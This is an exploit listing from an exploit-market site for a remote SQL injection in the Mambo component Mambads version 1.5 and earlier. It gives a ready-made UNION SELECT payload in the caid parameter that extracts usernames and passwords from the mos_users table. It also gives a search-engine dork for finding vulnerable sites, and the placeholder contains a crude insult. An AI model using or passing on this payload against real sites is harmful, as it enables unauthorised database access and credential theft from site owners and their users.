[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Mambo Component Mambads <= 1.5 Remote SQL Injection Vulnerability

Author
Sniper456
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2180
Category
web applications
Date add
28-09-2007
Platform
unsorted
=================================================================
Mambo Component Mambads <= 1.5 Remote SQL Injection Vulnerability
=================================================================



######################################
# Mambads <= 1.5 Sql Injection       #
######################################


Autor:Sniper456 

Greetss: PescaoDeth, Daemon21, Vampirin456, Shh-2, CodeBreak and the chilean People ;)



**SQL:
index.php?option=com_mambads&Itemid=0&func=detail&cacat=1&casb=1&caid=[inyecta maricon]


**Example:
index.php?option=com_mambads&Itemid=0&func=detail&cacat=1&casb=1&caid=999/**/Union/**/select/**/1,2,3,4,5,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20mos_users/*



Dork:  cuAck!, wena naaaty  xD   
         "inurl:com_mambads"


######################################



#  0day.today [2024-12-25]  #